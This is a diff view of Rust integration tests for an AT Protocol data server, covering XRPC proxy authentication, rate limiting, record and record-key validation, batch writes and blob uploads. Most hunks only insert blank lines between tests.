let app_url = common::base_url().await;
···
51
assert_eq!(uri, "/xrpc/com.example.test");
52
assert_eq!(auth, Some("Bearer test-token".to_string()));
53
}
54
+
55
#[tokio::test]
56
async fn test_proxy_auth_signing() {
57
let app_url = common::base_url().await;
···
80
assert_eq!(claims["aud"], upstream_url);
81
assert_eq!(claims["lxm"], "com.example.signed");
82
}
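// Sketch of the token shape test_proxy_auth_signing inspects (assumption: it
// follows the atproto inter-service auth convention). Only "aud" and "lxm"
// are asserted above; the remaining field names here are illustrative.
struct ServiceAuthClaimsSketch {
    /// DID of the calling account (token issuer).
    iss: String,
    /// Upstream service the request is proxied to; asserted to equal upstream_url.
    aud: String,
    /// Fully qualified XRPC method, e.g. "com.example.signed".
    lxm: String,
    /// Expiry as unix seconds; proxied tokens are typically short-lived.
    exp: i64,
}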
83
+
84
#[tokio::test]
85
async fn test_proxy_post_with_body() {
86
let app_url = common::base_url().await;
···
104
assert_eq!(uri, "/xrpc/com.example.postMethod");
105
assert_eq!(auth, Some("Bearer test-token".to_string()));
106
}
107
+
108
#[tokio::test]
109
async fn test_proxy_with_query_params() {
110
let app_url = common::base_url().await;
+5
tests/rate_limit.rs
···
2
use common::{base_url, client};
3
use reqwest::StatusCode;
4
use serde_json::json;
5
#[tokio::test]
6
#[ignore = "rate limiting is disabled in test environment"]
7
async fn test_login_rate_limiting() {
···
39
rate_limited_count
40
);
41
}
42
#[tokio::test]
43
#[ignore = "rate limiting is disabled in test environment"]
44
async fn test_password_reset_rate_limiting() {
···
78
success_count
79
);
80
}
81
#[tokio::test]
82
#[ignore = "rate limiting is disabled in test environment"]
83
async fn test_account_creation_rate_limiting() {
···
117
rate_limited_count
118
);
119
}
120
#[tokio::test]
121
async fn test_valkey_connection() {
122
if std::env::var("VALKEY_URL").is_err() {
···
154
.await
155
.expect("DEL failed");
156
}
157
#[tokio::test]
158
async fn test_distributed_rate_limiter_directly() {
159
if std::env::var("VALKEY_URL").is_err() {
···
2
use common::{base_url, client};
3
use reqwest::StatusCode;
4
use serde_json::json;
5
+
6
#[tokio::test]
7
#[ignore = "rate limiting is disabled in test environment"]
8
async fn test_login_rate_limiting() {
···
40
rate_limited_count
41
);
42
}
43
+
44
#[tokio::test]
45
#[ignore = "rate limiting is disabled in test environment"]
46
async fn test_password_reset_rate_limiting() {
···
80
success_count
81
);
82
}
83
+
84
#[tokio::test]
85
#[ignore = "rate limiting is disabled in test environment"]
86
async fn test_account_creation_rate_limiting() {
···
120
rate_limited_count
121
);
122
}
123
+
124
#[tokio::test]
125
async fn test_valkey_connection() {
126
if std::env::var("VALKEY_URL").is_err() {
···
158
.await
159
.expect("DEL failed");
160
}
161
+
162
#[tokio::test]
163
async fn test_distributed_rate_limiter_directly() {
164
if std::env::var("VALKEY_URL").is_err() {
+53
tests/record_validation.rs
···
1
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
use serde_json::json;
3
fn now() -> String {
4
chrono::Utc::now().to_rfc3339()
5
}
6
#[test]
7
fn test_validate_post_valid() {
8
let validator = RecordValidator::new();
···
14
let result = validator.validate(&post, "app.bsky.feed.post");
15
assert_eq!(result.unwrap(), ValidationStatus::Valid);
16
}
17
#[test]
18
fn test_validate_post_missing_text() {
19
let validator = RecordValidator::new();
···
24
let result = validator.validate(&post, "app.bsky.feed.post");
25
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
26
}
27
#[test]
28
fn test_validate_post_missing_created_at() {
29
let validator = RecordValidator::new();
···
34
let result = validator.validate(&post, "app.bsky.feed.post");
35
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
36
}
37
#[test]
38
fn test_validate_post_text_too_long() {
39
let validator = RecordValidator::new();
···
46
let result = validator.validate(&post, "app.bsky.feed.post");
47
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
48
}
49
#[test]
50
fn test_validate_post_text_at_limit() {
51
let validator = RecordValidator::new();
···
58
let result = validator.validate(&post, "app.bsky.feed.post");
59
assert_eq!(result.unwrap(), ValidationStatus::Valid);
60
}
61
#[test]
62
fn test_validate_post_too_many_langs() {
63
let validator = RecordValidator::new();
···
70
let result = validator.validate(&post, "app.bsky.feed.post");
71
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
72
}
73
#[test]
74
fn test_validate_post_three_langs_ok() {
75
let validator = RecordValidator::new();
···
82
let result = validator.validate(&post, "app.bsky.feed.post");
83
assert_eq!(result.unwrap(), ValidationStatus::Valid);
84
}
85
#[test]
86
fn test_validate_post_too_many_tags() {
87
let validator = RecordValidator::new();
···
94
let result = validator.validate(&post, "app.bsky.feed.post");
95
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
96
}
97
#[test]
98
fn test_validate_post_eight_tags_ok() {
99
let validator = RecordValidator::new();
···
106
let result = validator.validate(&post, "app.bsky.feed.post");
107
assert_eq!(result.unwrap(), ValidationStatus::Valid);
108
}
109
#[test]
110
fn test_validate_post_tag_too_long() {
111
let validator = RecordValidator::new();
···
119
let result = validator.validate(&post, "app.bsky.feed.post");
120
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
121
}
122
#[test]
123
fn test_validate_profile_valid() {
124
let validator = RecordValidator::new();
···
130
let result = validator.validate(&profile, "app.bsky.actor.profile");
131
assert_eq!(result.unwrap(), ValidationStatus::Valid);
132
}
133
#[test]
134
fn test_validate_profile_empty_ok() {
135
let validator = RecordValidator::new();
···
139
let result = validator.validate(&profile, "app.bsky.actor.profile");
140
assert_eq!(result.unwrap(), ValidationStatus::Valid);
141
}
142
#[test]
143
fn test_validate_profile_displayname_too_long() {
144
let validator = RecordValidator::new();
···
150
let result = validator.validate(&profile, "app.bsky.actor.profile");
151
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
152
}
153
#[test]
154
fn test_validate_profile_description_too_long() {
155
let validator = RecordValidator::new();
···
161
let result = validator.validate(&profile, "app.bsky.actor.profile");
162
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
163
}
164
#[test]
165
fn test_validate_like_valid() {
166
let validator = RecordValidator::new();
···
175
let result = validator.validate(&like, "app.bsky.feed.like");
176
assert_eq!(result.unwrap(), ValidationStatus::Valid);
177
}
178
#[test]
179
fn test_validate_like_missing_subject() {
180
let validator = RecordValidator::new();
···
185
let result = validator.validate(&like, "app.bsky.feed.like");
186
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
187
}
188
#[test]
189
fn test_validate_like_missing_subject_uri() {
190
let validator = RecordValidator::new();
···
198
let result = validator.validate(&like, "app.bsky.feed.like");
199
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
200
}
201
#[test]
202
fn test_validate_like_invalid_subject_uri() {
203
let validator = RecordValidator::new();
···
212
let result = validator.validate(&like, "app.bsky.feed.like");
213
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
214
}
215
#[test]
216
fn test_validate_repost_valid() {
217
let validator = RecordValidator::new();
···
226
let result = validator.validate(&repost, "app.bsky.feed.repost");
227
assert_eq!(result.unwrap(), ValidationStatus::Valid);
228
}
229
#[test]
230
fn test_validate_repost_missing_subject() {
231
let validator = RecordValidator::new();
···
236
let result = validator.validate(&repost, "app.bsky.feed.repost");
237
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
238
}
239
#[test]
240
fn test_validate_follow_valid() {
241
let validator = RecordValidator::new();
···
247
let result = validator.validate(&follow, "app.bsky.graph.follow");
248
assert_eq!(result.unwrap(), ValidationStatus::Valid);
249
}
250
#[test]
251
fn test_validate_follow_missing_subject() {
252
let validator = RecordValidator::new();
···
257
let result = validator.validate(&follow, "app.bsky.graph.follow");
258
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
}
260
#[test]
261
fn test_validate_follow_invalid_subject() {
262
let validator = RecordValidator::new();
···
268
let result = validator.validate(&follow, "app.bsky.graph.follow");
269
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
270
}
271
#[test]
272
fn test_validate_block_valid() {
273
let validator = RecordValidator::new();
···
279
let result = validator.validate(&block, "app.bsky.graph.block");
280
assert_eq!(result.unwrap(), ValidationStatus::Valid);
281
}
282
#[test]
283
fn test_validate_block_invalid_subject() {
284
let validator = RecordValidator::new();
···
290
let result = validator.validate(&block, "app.bsky.graph.block");
291
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
292
}
293
#[test]
294
fn test_validate_list_valid() {
295
let validator = RecordValidator::new();
···
302
let result = validator.validate(&list, "app.bsky.graph.list");
303
assert_eq!(result.unwrap(), ValidationStatus::Valid);
304
}
305
#[test]
306
fn test_validate_list_name_too_long() {
307
let validator = RecordValidator::new();
···
315
let result = validator.validate(&list, "app.bsky.graph.list");
316
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
317
}
318
#[test]
319
fn test_validate_list_empty_name() {
320
let validator = RecordValidator::new();
···
327
let result = validator.validate(&list, "app.bsky.graph.list");
328
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
329
}
330
#[test]
331
fn test_validate_feed_generator_valid() {
332
let validator = RecordValidator::new();
···
339
let result = validator.validate(&generator, "app.bsky.feed.generator");
340
assert_eq!(result.unwrap(), ValidationStatus::Valid);
341
}
342
#[test]
343
fn test_validate_feed_generator_displayname_too_long() {
344
let validator = RecordValidator::new();
···
352
let result = validator.validate(&generator, "app.bsky.feed.generator");
353
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
354
}
355
#[test]
356
fn test_validate_unknown_type_returns_unknown() {
357
let validator = RecordValidator::new();
···
362
let result = validator.validate(&custom, "com.custom.record");
363
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
364
}
365
#[test]
366
fn test_validate_unknown_type_strict_rejects() {
367
let validator = RecordValidator::new().require_lexicon(true);
···
372
let result = validator.validate(&custom, "com.custom.record");
373
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
374
}
375
#[test]
376
fn test_validate_type_mismatch() {
377
let validator = RecordValidator::new();
···
384
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
385
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
386
}
387
#[test]
388
fn test_validate_missing_type() {
389
let validator = RecordValidator::new();
···
393
let result = validator.validate(&record, "app.bsky.feed.post");
394
assert!(matches!(result, Err(ValidationError::MissingType)));
395
}
396
#[test]
397
fn test_validate_not_object() {
398
let validator = RecordValidator::new();
···
400
let result = validator.validate(&record, "app.bsky.feed.post");
401
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
402
}
403
#[test]
404
fn test_validate_datetime_format_valid() {
405
let validator = RecordValidator::new();
···
411
let result = validator.validate(&post, "app.bsky.feed.post");
412
assert_eq!(result.unwrap(), ValidationStatus::Valid);
413
}
414
#[test]
415
fn test_validate_datetime_with_offset() {
416
let validator = RecordValidator::new();
···
422
let result = validator.validate(&post, "app.bsky.feed.post");
423
assert_eq!(result.unwrap(), ValidationStatus::Valid);
424
}
425
#[test]
426
fn test_validate_datetime_invalid_format() {
427
let validator = RecordValidator::new();
···
433
let result = validator.validate(&post, "app.bsky.feed.post");
434
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
435
}
436
#[test]
437
fn test_validate_record_key_valid() {
438
assert!(validate_record_key("3k2n5j2").is_ok());
···
442
assert!(validate_record_key("valid~key").is_ok());
443
assert!(validate_record_key("self").is_ok());
444
}
445
#[test]
446
fn test_validate_record_key_empty() {
447
let result = validate_record_key("");
448
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
449
}
450
#[test]
451
fn test_validate_record_key_dot() {
452
assert!(validate_record_key(".").is_err());
453
assert!(validate_record_key("..").is_err());
454
}
455
#[test]
456
fn test_validate_record_key_invalid_chars() {
457
assert!(validate_record_key("invalid/key").is_err());
···
459
assert!(validate_record_key("invalid@key").is_err());
460
assert!(validate_record_key("invalid#key").is_err());
461
}
462
#[test]
463
fn test_validate_record_key_too_long() {
464
let long_key = "k".repeat(513);
465
let result = validate_record_key(&long_key);
466
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
467
}
468
#[test]
469
fn test_validate_record_key_at_max_length() {
470
let max_key = "k".repeat(512);
471
assert!(validate_record_key(&max_key).is_ok());
472
}
473
#[test]
474
fn test_validate_collection_nsid_valid() {
475
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
477
assert!(validate_collection_nsid("a.b.c").is_ok());
478
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
479
}
480
#[test]
481
fn test_validate_collection_nsid_empty() {
482
let result = validate_collection_nsid("");
483
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
484
}
485
#[test]
486
fn test_validate_collection_nsid_too_few_segments() {
487
assert!(validate_collection_nsid("a").is_err());
488
assert!(validate_collection_nsid("a.b").is_err());
489
}
490
#[test]
491
fn test_validate_collection_nsid_empty_segment() {
492
assert!(validate_collection_nsid("a..b.c").is_err());
493
assert!(validate_collection_nsid(".a.b.c").is_err());
494
assert!(validate_collection_nsid("a.b.c.").is_err());
495
}
496
#[test]
497
fn test_validate_collection_nsid_invalid_chars() {
498
assert!(validate_collection_nsid("a.b.c/d").is_err());
499
assert!(validate_collection_nsid("a.b.c_d").is_err());
500
assert!(validate_collection_nsid("a.b.c@d").is_err());
501
}
502
#[test]
503
fn test_validate_threadgate() {
504
let validator = RecordValidator::new();
···
510
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
511
assert_eq!(result.unwrap(), ValidationStatus::Valid);
512
}
513
#[test]
514
fn test_validate_labeler_service() {
515
let validator = RecordValidator::new();
···
523
let result = validator.validate(&labeler, "app.bsky.labeler.service");
524
assert_eq!(result.unwrap(), ValidationStatus::Valid);
525
}
526
#[test]
527
fn test_validate_list_item() {
528
let validator = RecordValidator::new();
···
1
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
use serde_json::json;
3
+
4
fn now() -> String {
5
chrono::Utc::now().to_rfc3339()
6
}
7
+
8
#[test]
9
fn test_validate_post_valid() {
10
let validator = RecordValidator::new();
···
16
let result = validator.validate(&post, "app.bsky.feed.post");
17
assert_eq!(result.unwrap(), ValidationStatus::Valid);
18
}
19
+
20
#[test]
21
fn test_validate_post_missing_text() {
22
let validator = RecordValidator::new();
···
27
let result = validator.validate(&post, "app.bsky.feed.post");
28
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
29
}
30
+
31
#[test]
32
fn test_validate_post_missing_created_at() {
33
let validator = RecordValidator::new();
···
38
let result = validator.validate(&post, "app.bsky.feed.post");
39
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
40
}
41
+
42
#[test]
43
fn test_validate_post_text_too_long() {
44
let validator = RecordValidator::new();
···
51
let result = validator.validate(&post, "app.bsky.feed.post");
52
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
53
}
54
+
55
#[test]
56
fn test_validate_post_text_at_limit() {
57
let validator = RecordValidator::new();
···
64
let result = validator.validate(&post, "app.bsky.feed.post");
65
assert_eq!(result.unwrap(), ValidationStatus::Valid);
66
}
67
+
68
#[test]
69
fn test_validate_post_too_many_langs() {
70
let validator = RecordValidator::new();
···
77
let result = validator.validate(&post, "app.bsky.feed.post");
78
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
79
}
80
+
81
#[test]
82
fn test_validate_post_three_langs_ok() {
83
let validator = RecordValidator::new();
···
90
let result = validator.validate(&post, "app.bsky.feed.post");
91
assert_eq!(result.unwrap(), ValidationStatus::Valid);
92
}
93
+
94
#[test]
95
fn test_validate_post_too_many_tags() {
96
let validator = RecordValidator::new();
···
103
let result = validator.validate(&post, "app.bsky.feed.post");
104
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
105
}
106
+
107
#[test]
108
fn test_validate_post_eight_tags_ok() {
109
let validator = RecordValidator::new();
···
116
let result = validator.validate(&post, "app.bsky.feed.post");
117
assert_eq!(result.unwrap(), ValidationStatus::Valid);
118
}
119
+
120
#[test]
121
fn test_validate_post_tag_too_long() {
122
let validator = RecordValidator::new();
···
130
let result = validator.validate(&post, "app.bsky.feed.post");
131
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
132
}
133
+
134
#[test]
135
fn test_validate_profile_valid() {
136
let validator = RecordValidator::new();
···
142
let result = validator.validate(&profile, "app.bsky.actor.profile");
143
assert_eq!(result.unwrap(), ValidationStatus::Valid);
144
}
145
+
146
#[test]
147
fn test_validate_profile_empty_ok() {
148
let validator = RecordValidator::new();
···
152
let result = validator.validate(&profile, "app.bsky.actor.profile");
153
assert_eq!(result.unwrap(), ValidationStatus::Valid);
154
}
155
+
156
#[test]
157
fn test_validate_profile_displayname_too_long() {
158
let validator = RecordValidator::new();
···
164
let result = validator.validate(&profile, "app.bsky.actor.profile");
165
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
166
}
167
+
168
#[test]
169
fn test_validate_profile_description_too_long() {
170
let validator = RecordValidator::new();
···
176
let result = validator.validate(&profile, "app.bsky.actor.profile");
177
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
178
}
179
+
180
#[test]
181
fn test_validate_like_valid() {
182
let validator = RecordValidator::new();
···
191
let result = validator.validate(&like, "app.bsky.feed.like");
192
assert_eq!(result.unwrap(), ValidationStatus::Valid);
193
}
194
+
195
#[test]
196
fn test_validate_like_missing_subject() {
197
let validator = RecordValidator::new();
···
202
let result = validator.validate(&like, "app.bsky.feed.like");
203
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
204
}
205
+
206
#[test]
207
fn test_validate_like_missing_subject_uri() {
208
let validator = RecordValidator::new();
···
216
let result = validator.validate(&like, "app.bsky.feed.like");
217
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
218
}
219
+
220
#[test]
221
fn test_validate_like_invalid_subject_uri() {
222
let validator = RecordValidator::new();
···
231
let result = validator.validate(&like, "app.bsky.feed.like");
232
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
233
}
234
+
235
#[test]
236
fn test_validate_repost_valid() {
237
let validator = RecordValidator::new();
···
246
let result = validator.validate(&repost, "app.bsky.feed.repost");
247
assert_eq!(result.unwrap(), ValidationStatus::Valid);
248
}
249
+
250
#[test]
251
fn test_validate_repost_missing_subject() {
252
let validator = RecordValidator::new();
···
257
let result = validator.validate(&repost, "app.bsky.feed.repost");
258
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
}
260
+
261
#[test]
262
fn test_validate_follow_valid() {
263
let validator = RecordValidator::new();
···
269
let result = validator.validate(&follow, "app.bsky.graph.follow");
270
assert_eq!(result.unwrap(), ValidationStatus::Valid);
271
}
272
+
273
#[test]
274
fn test_validate_follow_missing_subject() {
275
let validator = RecordValidator::new();
···
280
let result = validator.validate(&follow, "app.bsky.graph.follow");
281
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
282
}
283
+
284
#[test]
285
fn test_validate_follow_invalid_subject() {
286
let validator = RecordValidator::new();
···
292
let result = validator.validate(&follow, "app.bsky.graph.follow");
293
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
294
}
295
+
296
#[test]
297
fn test_validate_block_valid() {
298
let validator = RecordValidator::new();
···
304
let result = validator.validate(&block, "app.bsky.graph.block");
305
assert_eq!(result.unwrap(), ValidationStatus::Valid);
306
}
307
+
308
#[test]
309
fn test_validate_block_invalid_subject() {
310
let validator = RecordValidator::new();
···
316
let result = validator.validate(&block, "app.bsky.graph.block");
317
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
318
}
319
+
320
#[test]
321
fn test_validate_list_valid() {
322
let validator = RecordValidator::new();
···
329
let result = validator.validate(&list, "app.bsky.graph.list");
330
assert_eq!(result.unwrap(), ValidationStatus::Valid);
331
}
332
+
333
#[test]
334
fn test_validate_list_name_too_long() {
335
let validator = RecordValidator::new();
···
343
let result = validator.validate(&list, "app.bsky.graph.list");
344
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
345
}
346
+
347
#[test]
348
fn test_validate_list_empty_name() {
349
let validator = RecordValidator::new();
···
356
let result = validator.validate(&list, "app.bsky.graph.list");
357
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
358
}
359
+
360
#[test]
361
fn test_validate_feed_generator_valid() {
362
let validator = RecordValidator::new();
···
369
let result = validator.validate(&generator, "app.bsky.feed.generator");
370
assert_eq!(result.unwrap(), ValidationStatus::Valid);
371
}
372
+
373
#[test]
374
fn test_validate_feed_generator_displayname_too_long() {
375
let validator = RecordValidator::new();
···
383
let result = validator.validate(&generator, "app.bsky.feed.generator");
384
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
385
}
386
+
387
#[test]
388
fn test_validate_unknown_type_returns_unknown() {
389
let validator = RecordValidator::new();
···
394
let result = validator.validate(&custom, "com.custom.record");
395
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
396
}
397
+
398
#[test]
399
fn test_validate_unknown_type_strict_rejects() {
400
let validator = RecordValidator::new().require_lexicon(true);
···
405
let result = validator.validate(&custom, "com.custom.record");
406
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
407
}
408
+
409
#[test]
410
fn test_validate_type_mismatch() {
411
let validator = RecordValidator::new();
···
418
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
419
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
420
}
421
+
422
#[test]
423
fn test_validate_missing_type() {
424
let validator = RecordValidator::new();
···
428
let result = validator.validate(&record, "app.bsky.feed.post");
429
assert!(matches!(result, Err(ValidationError::MissingType)));
430
}
431
+
432
#[test]
433
fn test_validate_not_object() {
434
let validator = RecordValidator::new();
···
436
let result = validator.validate(&record, "app.bsky.feed.post");
437
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
438
}
439
+
440
#[test]
441
fn test_validate_datetime_format_valid() {
442
let validator = RecordValidator::new();
···
448
let result = validator.validate(&post, "app.bsky.feed.post");
449
assert_eq!(result.unwrap(), ValidationStatus::Valid);
450
}
451
+
452
#[test]
453
fn test_validate_datetime_with_offset() {
454
let validator = RecordValidator::new();
···
460
let result = validator.validate(&post, "app.bsky.feed.post");
461
assert_eq!(result.unwrap(), ValidationStatus::Valid);
462
}
463
+
464
#[test]
465
fn test_validate_datetime_invalid_format() {
466
let validator = RecordValidator::new();
···
472
let result = validator.validate(&post, "app.bsky.feed.post");
473
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
474
}
475
+
476
#[test]
477
fn test_validate_record_key_valid() {
478
assert!(validate_record_key("3k2n5j2").is_ok());
···
482
assert!(validate_record_key("valid~key").is_ok());
483
assert!(validate_record_key("self").is_ok());
484
}
485
+
486
#[test]
487
fn test_validate_record_key_empty() {
488
let result = validate_record_key("");
489
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
490
}
491
+
492
#[test]
493
fn test_validate_record_key_dot() {
494
assert!(validate_record_key(".").is_err());
495
assert!(validate_record_key("..").is_err());
496
}
497
+
498
#[test]
499
fn test_validate_record_key_invalid_chars() {
500
assert!(validate_record_key("invalid/key").is_err());
···
502
assert!(validate_record_key("invalid@key").is_err());
503
assert!(validate_record_key("invalid#key").is_err());
504
}
505
+
506
#[test]
507
fn test_validate_record_key_too_long() {
508
let long_key = "k".repeat(513);
509
let result = validate_record_key(&long_key);
510
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
511
}
512
+
513
#[test]
514
fn test_validate_record_key_at_max_length() {
515
let max_key = "k".repeat(512);
516
assert!(validate_record_key(&max_key).is_ok());
517
}
518
+
519
#[test]
520
fn test_validate_collection_nsid_valid() {
521
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
523
assert!(validate_collection_nsid("a.b.c").is_ok());
524
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
525
}
526
+
527
#[test]
528
fn test_validate_collection_nsid_empty() {
529
let result = validate_collection_nsid("");
530
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
531
}
532
+
533
#[test]
534
fn test_validate_collection_nsid_too_few_segments() {
535
assert!(validate_collection_nsid("a").is_err());
536
assert!(validate_collection_nsid("a.b").is_err());
537
}
538
+
539
#[test]
540
fn test_validate_collection_nsid_empty_segment() {
541
assert!(validate_collection_nsid("a..b.c").is_err());
542
assert!(validate_collection_nsid(".a.b.c").is_err());
543
assert!(validate_collection_nsid("a.b.c.").is_err());
544
}
545
+
546
#[test]
547
fn test_validate_collection_nsid_invalid_chars() {
548
assert!(validate_collection_nsid("a.b.c/d").is_err());
549
assert!(validate_collection_nsid("a.b.c_d").is_err());
550
assert!(validate_collection_nsid("a.b.c@d").is_err());
551
}
552
+
553
#[test]
554
fn test_validate_threadgate() {
555
let validator = RecordValidator::new();
···
561
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
562
assert_eq!(result.unwrap(), ValidationStatus::Valid);
563
}
564
+
565
#[test]
566
fn test_validate_labeler_service() {
567
let validator = RecordValidator::new();
···
575
let result = validator.validate(&labeler, "app.bsky.labeler.service");
576
assert_eq!(result.unwrap(), ValidationStatus::Valid);
577
}
578
+
579
#[test]
580
fn test_validate_list_item() {
581
let validator = RecordValidator::new();
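
The record-key and NSID tests above encode the validation rules only implicitly. As a point of reference, a minimal record-key check consistent with those assertions (non-empty, at most 512 characters, not "." or "..", and limited to ASCII letters, digits, and . _ : ~ -) could be sketched as follows; this is an illustrative sketch, not the actual bspds::validation implementation, whose structure and error types may differ.

// Illustrative sketch only: mirrors the constraints asserted by the
// record-key tests above, not the real bspds::validation internals.
fn record_key_is_plausible(key: &str) -> bool {
    // Reject empty keys and keys longer than 512 bytes.
    if key.is_empty() || key.len() > 512 {
        return false;
    }
    // "." and ".." are reserved and rejected.
    if key == "." || key == ".." {
        return false;
    }
    // Only ASCII alphanumerics plus . _ : ~ - are allowed.
    key.chars()
        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | ':' | '~' | '-'))
}
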
+6
tests/repo_batch.rs
···
3
use chrono::Utc;
4
use reqwest::StatusCode;
5
use serde_json::{Value, json};
6
#[tokio::test]
7
async fn test_apply_writes_create() {
8
let client = client();
···
50
assert!(results[0]["uri"].is_string());
51
assert!(results[0]["cid"].is_string());
52
}
53
#[tokio::test]
54
async fn test_apply_writes_update() {
55
let client = client();
···
108
assert_eq!(results.len(), 1);
109
assert!(results[0]["uri"].is_string());
110
}
111
#[tokio::test]
112
async fn test_apply_writes_delete() {
113
let client = client();
···
171
.expect("Failed to verify");
172
assert_eq!(get_res.status(), StatusCode::NOT_FOUND);
173
}
174
#[tokio::test]
175
async fn test_apply_writes_mixed_operations() {
176
let client = client();
···
258
let results = body["results"].as_array().unwrap();
259
assert_eq!(results.len(), 3);
260
}
261
#[tokio::test]
262
async fn test_apply_writes_no_auth() {
263
let client = client();
···
286
.expect("Failed to send request");
287
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
288
}
289
#[tokio::test]
290
async fn test_apply_writes_empty_writes() {
291
let client = client();
···
3
use chrono::Utc;
4
use reqwest::StatusCode;
5
use serde_json::{Value, json};
6
+
7
#[tokio::test]
8
async fn test_apply_writes_create() {
9
let client = client();
···
51
assert!(results[0]["uri"].is_string());
52
assert!(results[0]["cid"].is_string());
53
}
54
+
55
#[tokio::test]
56
async fn test_apply_writes_update() {
57
let client = client();
···
110
assert_eq!(results.len(), 1);
111
assert!(results[0]["uri"].is_string());
112
}
113
+
114
#[tokio::test]
115
async fn test_apply_writes_delete() {
116
let client = client();
···
174
.expect("Failed to verify");
175
assert_eq!(get_res.status(), StatusCode::NOT_FOUND);
176
}
177
+
178
#[tokio::test]
179
async fn test_apply_writes_mixed_operations() {
180
let client = client();
···
262
let results = body["results"].as_array().unwrap();
263
assert_eq!(results.len(), 3);
264
}
265
+
266
#[tokio::test]
267
async fn test_apply_writes_no_auth() {
268
let client = client();
···
291
.expect("Failed to send request");
292
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
293
}
294
+
295
#[tokio::test]
296
async fn test_apply_writes_empty_writes() {
297
let client = client();
+6
tests/repo_blob.rs
···
2
use common::*;
3
use reqwest::{StatusCode, header};
4
use serde_json::Value;
5
#[tokio::test]
6
async fn test_upload_blob_no_auth() {
7
let client = client();
···
19
let body: Value = res.json().await.expect("Response was not valid JSON");
20
assert_eq!(body["error"], "AuthenticationRequired");
21
}
22
#[tokio::test]
23
async fn test_upload_blob_success() {
24
let client = client();
···
38
let body: Value = res.json().await.expect("Response was not valid JSON");
39
assert!(body["blob"]["ref"]["$link"].as_str().is_some());
40
}
41
#[tokio::test]
42
async fn test_upload_blob_bad_token() {
43
let client = client();
···
56
let body: Value = res.json().await.expect("Response was not valid JSON");
57
assert_eq!(body["error"], "AuthenticationFailed");
58
}
59
#[tokio::test]
60
async fn test_upload_blob_unsupported_mime_type() {
61
let client = client();
···
73
.expect("Failed to send request");
74
assert_eq!(res.status(), StatusCode::OK);
75
}
76
#[tokio::test]
77
async fn test_list_missing_blobs() {
78
let client = client();
···
90
let body: Value = res.json().await.expect("Response was not valid JSON");
91
assert!(body["blobs"].is_array());
92
}
93
#[tokio::test]
94
async fn test_list_missing_blobs_no_auth() {
95
let client = client();
···
2
